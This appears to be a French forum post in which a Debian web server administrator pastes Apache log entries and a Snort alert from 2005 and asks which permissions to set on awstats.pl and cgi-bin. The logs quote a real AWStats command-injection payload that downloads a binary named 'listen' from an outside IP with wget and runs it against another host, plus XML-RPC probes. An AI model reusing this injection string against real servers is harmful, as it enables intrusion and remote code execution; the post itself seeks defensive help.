J’héberge un serveur web sur Debian Sarge (noyau 2.6.13.2) et j’ai repéré ceci dans /var/log/apache/access.log récemment :
63.76.208.71 - - [09/Nov/2005:14:24:42 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:44 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:46 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:48 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:49 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:51 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:52 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:53 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:54 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:55 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:56 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
Hier, pendant le même type d’accès, j’ai vu apparaître ceci dans /var/log/snort/alert :
[**] [1:721:8] VIRUS OUTBOUND bad file attachment [**]
[Classification: A suspicious filename was detected] [Priority: 2]
11/08-19:48:26.756271 192.168.0.123:34245 -> 212.27.48.4:25
TCP TTL:64 TOS:0x0 ID:29222 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x3B2BC401 Ack: 0x136FEC9A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 176629 1064132463
Tout à l’air de fonctionner mais je me demande que doivent être les groupes et permissions pour les fichiers qui ont été inspectés (awstats.pl, le répertoire cgi-bin/ en général, etc) ?
Merci de votre aide